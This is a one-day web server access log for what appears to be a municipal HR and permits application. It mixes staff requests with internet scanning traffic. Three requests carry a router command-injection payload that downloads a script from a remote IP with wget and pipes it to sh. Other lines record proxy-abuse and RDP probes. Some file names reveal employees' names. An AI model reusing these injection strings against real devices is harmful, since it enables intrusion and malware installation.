10.40.40.2 - - [30/Sep/2024:17:19:56 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21787,,SolicitudOTAdjuntos HTTP/1.1" 200 11232
10.40.40.2 - - [30/Sep/2024:17:19:57 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
190.171.154.42 - - [30/Sep/2024:17:19:59 -0300] "GET /cormun/PublicTempStorage/permiso_administrativo_jorge_maldaonado9899508.pdf HTTP/1.1" 200 174296
190.171.154.42 - - [30/Sep/2024:17:20:07 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 7016
10.40.40.2 - - [30/Sep/2024:17:20:12 -0300] "GET /cormun/PublicTempStorage/cv_natalia_%F1anco8833989.docx HTTP/1.1" 200 259615
190.171.154.42 - - [30/Sep/2024:17:20:15 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 6997
190.171.154.42 - - [30/Sep/2024:17:20:19 -0300] "POST /cormun/servlet/trautorizarpermisogoce?ca18625f8b500d55fca799d37dde08b0,,gx-no-cache=1727727584150 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:20:19 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 992
190.171.154.42 - - [30/Sep/2024:17:20:19 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 6995
190.171.154.42 - - [30/Sep/2024:17:20:23 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 6997
190.171.154.42 - - [30/Sep/2024:17:20:46 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 6970
10.40.40.2 - - [30/Sep/2024:17:20:52 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21787,,General HTTP/1.1" 200 8432
10.40.40.2 - - [30/Sep/2024:17:20:52 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
190.171.154.42 - - [30/Sep/2024:17:20:55 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10844
190.171.154.42 - - [30/Sep/2024:17:21:09 -0300] "GET /cormun/servlet/apermisogoceprn?18042337,P,20240930171230,PU HTTP/1.1" 200 1673
190.171.154.42 - - [30/Sep/2024:17:22:48 -0300] "POST /cormun/servlet/trpermisosgoce?ca18625f8b500d55fca799d37dde08b0,,gx-no-cache=1727727732883 HTTP/1.1" 200 15779
190.171.154.42 - - [30/Sep/2024:17:22:48 -0300] "GET /cormun/static/Resources/PXToolsGridNext.gif HTTP/1.1" 200 369
190.171.154.42 - - [30/Sep/2024:17:22:48 -0300] "GET /cormun/static/Resources/PXToolsGridLast.gif HTTP/1.1" 200 370
190.171.154.42 - - [30/Sep/2024:17:22:52 -0300] "GET /cormun/servlet/apermisogoceprn?9221595,P,20240826174920,PU HTTP/1.1" 200 1662
190.171.154.42 - - [30/Sep/2024:17:23:05 -0300] "GET /cormun/servlet/apermisogoceprn?9221595,P,20240826174920,PU HTTP/1.1" 200 1663
190.171.154.42 - - [30/Sep/2024:17:23:24 -0300] "GET /cormun/servlet/apermisogoceprn?9221595,P,20240611120335,PU HTTP/1.1" 200 1666
190.171.141.138 - - [30/Sep/2024:17:27:45 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15462
10.40.40.2 - - [30/Sep/2024:17:30:08 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 8321
10.40.40.2 - - [30/Sep/2024:17:30:13 -0300] "POST /cormun/servlet/trsolicitudgral?d91189e492caae02c7b2630fb2ec1158,,gx-no-cache=1727728213485 HTTP/1.1" 200 7619
190.45.8.34 - - [30/Sep/2024:17:30:27 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6053
190.45.8.34 - - [30/Sep/2024:17:30:28 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1739
190.171.141.90 - - [30/Sep/2024:17:47:09 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727729193829 HTTP/1.1" 200 12596
78.108.177.52 - - [30/Sep/2024:17:47:44 -0300] "GET / HTTP/1.0" 200 11197
190.171.141.98 - - [30/Sep/2024:17:50:01 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
45.148.10.242 - - [30/Sep/2024:17:50:50 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
205.210.31.58 - - [30/Sep/2024:17:51:56 -0300] "GET / HTTP/1.1" 200 11217
190.171.142.10 - - [30/Sep/2024:17:57:54 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.142.10 - - [30/Sep/2024:17:57:58 -0300] "POST /cormun/servlet/hlogin?53037eb183778ad6833dd554358be0e9,gx-no-cache=1727729842156 HTTP/1.1" 200 90
190.171.142.10 - - [30/Sep/2024:17:57:58 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.142.10 - - [30/Sep/2024:17:57:58 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4205
190.171.142.10 - - [30/Sep/2024:17:58:03 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13535
71.6.232.27 - - [30/Sep/2024:17:59:28 -0300] "GET / HTTP/1.1" 200 11217
190.171.142.10 - - [30/Sep/2024:17:59:41 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6050
190.171.142.10 - - [30/Sep/2024:17:59:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
190.171.142.10 - - [30/Sep/2024:17:59:46 -0300] "POST /cormun/servlet/hlogin?ea9fed0810f3a30a338050c8723cc32a,gx-no-cache=1727729950448 HTTP/1.1" 200 90
190.171.142.10 - - [30/Sep/2024:17:59:46 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 956
190.171.142.10 - - [30/Sep/2024:17:59:46 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13294
52.167.144.22 - - [30/Sep/2024:18:14:48 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
52.167.144.22 - - [30/Sep/2024:18:15:29 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
52.167.144.22 - - [30/Sep/2024:18:15:29 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
40.77.167.72 - - [30/Sep/2024:18:15:34 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
40.77.167.65 - - [30/Sep/2024:18:15:39 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
40.77.167.65 - - [30/Sep/2024:18:15:39 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
40.77.167.65 - - [30/Sep/2024:18:15:40 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
190.171.142.10 - - [30/Sep/2024:18:18:46 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.142.10 - - [30/Sep/2024:18:18:50 -0300] "POST /cormun/servlet/hlogin?53037eb183778ad6833dd554358be0e9,gx-no-cache=1727731094413 HTTP/1.1" 200 90
190.171.142.10 - - [30/Sep/2024:18:18:50 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.142.10 - - [30/Sep/2024:18:18:50 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13535
185.224.128.59 - - [30/Sep/2024:18:34:15 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
185.224.128.67 - - [30/Sep/2024:18:35:26 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
52.167.144.18 - - [30/Sep/2024:18:38:28 -0300] "GET /sitemaps.xml HTTP/1.1" 404 985
154.213.187.5 - - [30/Sep/2024:18:49:19 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
40.77.167.79 - - [30/Sep/2024:18:51:18 -0300] "GET /sitemap_index.xml HTTP/1.1" 404 995
190.171.142.10 - - [30/Sep/2024:19:15:40 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1711
190.171.142.10 - - [30/Sep/2024:19:15:44 -0300] "POST /cormun/servlet/hlogin?7b52b44d38ca2c87a3941e5436a406a2,gx-no-cache=1727734508187 HTTP/1.1" 200 90
190.171.142.10 - - [30/Sep/2024:19:15:44 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 943
190.171.142.10 - - [30/Sep/2024:19:15:44 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4198
190.171.142.10 - - [30/Sep/2024:19:15:48 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13524
87.120.166.244 - - [30/Sep/2024:19:32:54 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
45.79.181.94 - - [30/Sep/2024:19:43:46 -0300] "GET / HTTP/1.1" 200 11217
154.213.184.25 - - [30/Sep/2024:20:06:37 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
178.128.167.206 - - [30/Sep/2024:20:08:24 -0300] "GET / HTTP/1.1" 200 11217
178.128.167.206 - - [30/Sep/2024:20:08:24 -0300] "GET /download/powershell/ HTTP/1.1" 404 1001
205.210.31.240 - - [30/Sep/2024:20:25:46 -0300] "GET / HTTP/1.1" 200 11217
185.224.128.83 - - [30/Sep/2024:20:25:56 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
60.190.226.186 - - [30/Sep/2024:20:28:29 -0300] "GET / HTTP/1.0" 200 11197
115.238.44.234 - - [30/Sep/2024:20:32:45 -0300] "GET / HTTP/1.0" 200 11197
154.213.184.25 - - [30/Sep/2024:21:07:24 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
172.168.153.179 - - [30/Sep/2024:21:08:08 -0300] "-" 400 -
104.28.59.130 - - [30/Sep/2024:21:09:22 -0300] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1025
104.28.59.130 - - [30/Sep/2024:21:09:22 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
104.28.59.126 - - [30/Sep/2024:21:09:22 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3321
104.28.59.126 - - [30/Sep/2024:21:09:22 -0300] "GET /apple-touch-icon.png HTTP/1.1" 404 1001
95.214.55.43 - - [30/Sep/2024:21:21:50 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
147.45.112.17 - - [30/Sep/2024:22:09:59 -0300] "/*àCookie: mstshash=Administr " 400 -
198.235.24.99 - - [30/Sep/2024:22:17:43 -0300] "-" 400 -
198.235.24.99 - - [30/Sep/2024:22:17:43 -0300] "ÊÆ?%Ô¤‹’{á[uaDœŸl›û®gÜ>Bø•£aähÌÌÀ/À+À0À,ÀÀÀ'À#ÀÀ À(À$ÀÀ " 400 -
181.161.6.128 - - [30/Sep/2024:22:47:08 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6045
181.161.6.128 - - [30/Sep/2024:22:47:08 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
181.161.6.128 - - [30/Sep/2024:22:47:08 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6045
181.161.6.128 - - [30/Sep/2024:22:47:12 -0300] "POST /cormun/servlet/hlogin?b98249f1608d9ca72ce13ba55698f559,gx-no-cache=1727747195862 HTTP/1.1" 200 90
181.161.6.128 - - [30/Sep/2024:22:47:12 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
181.161.6.128 - - [30/Sep/2024:22:47:12 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13295
185.224.128.67 - - [30/Sep/2024:22:49:22 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
179.43.133.162 - - [30/Sep/2024:23:02:27 -0300] "CONNECT cloudflare.com:443 HTTP/1.1" 400 -
198.235.24.243 - - [30/Sep/2024:23:13:26 -0300] "GET / HTTP/1.0" 200 11197
185.224.128.59 - - [30/Sep/2024:23:21:59 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
154.216.17.93 - - [30/Sep/2024:23:35:50 -0300] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 -
45.84.89.2 - - [30/Sep/2024:23:42:33 -0300] "GET / HTTP/1.1" 200 11217
185.224.128.83 - - [30/Sep/2024:23:56:40 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013